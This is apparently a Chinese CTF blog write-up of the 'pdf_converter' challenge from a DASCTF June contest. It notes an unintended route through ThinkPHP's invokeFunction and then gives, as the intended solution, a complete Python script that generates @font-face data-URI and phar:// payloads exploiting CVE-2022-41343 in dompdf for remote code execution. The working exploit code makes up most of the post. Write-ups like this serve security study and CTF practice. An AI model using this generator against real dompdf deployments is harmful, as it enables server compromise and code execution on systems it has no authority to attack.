2023-04-24  218ebf3aa3744b5ab8229e5a15bf5cd7 99+   2 分钟   0.3 k0次访问

DasctfSU6月赛

【困难】pdf_converter

非预期,

1
2
3
4
5
6
7
8
9
10
public static function invokeFunction($function, $vars = [])
{
    $reflect = new \ReflectionFunction($function);
    $args    = self::bindParams($reflect, $vars);

    // 记录执行信息
    self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');

    return $reflect->invokeArgs($args);
}

直接日进去了

预期解:

CVE-2022-41343

当时都搜到了qwq

http://buaq.net/go-129526.html

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
    @font-face {
        font-family:'exploit';
        src:url('%s');
        font-weight:'normal';
        font-style:'normal';
    }
</style>
'''

def get_args():
    parser = argparse.ArgumentParser( prog="generate_payload.py",
                      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                      epilog= '''
                       This script will generate payloads for CVE-2022-41343
                      ''')
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument("-p", "--path", default="/var/www/", help="Base path to vendor directory (Default = /var/www/)")
    args = parser.parse_args()
    return args

def main():
    args = get_args()
    file = args.file.strip()
    path = args.path.strip()
    if(os.path.exists(file)):
        generate_payloads(file, path)
    else:
        print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc)
    data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
    md5 = hashlib.md5(data_uri_pure.encode()).hexdigest()
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path,md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

if __name__ == "__main__":
    main()

DasctfSU6月赛

xn--upon-eu0gs25bb4r113aow1c.googles.icu/2023/04/24/DasctfSU6月赛/

作者

UPON2021

发布于

2023-04-24

更新于

2023-04-24

许可协议

# 相关文章
  1.一次基于ast的python反混淆尝试
  2.碎碎念
  3.redos
  4.hxpctf valentine
  5.某游私服原理
  6.CBC反转攻击详解
  7.文件上传备忘录
  8.Round 6复现
评论
关注我

:D 一言句子获取中...

链接

最新评论

加载中,最新评论有1分钟缓存...

最新文章

分类

归档

标签

CTF5
WEB5
复现4
ETH2
RCE2
Solidity2
ThinkPHP2
python2
ssti2
upload2
web2
Blockchain1
Crypto1
DOS1
Go1
Hexo1
Javascript1
LFI1
MITM1
PHP1
查看全部>>

订阅更新

×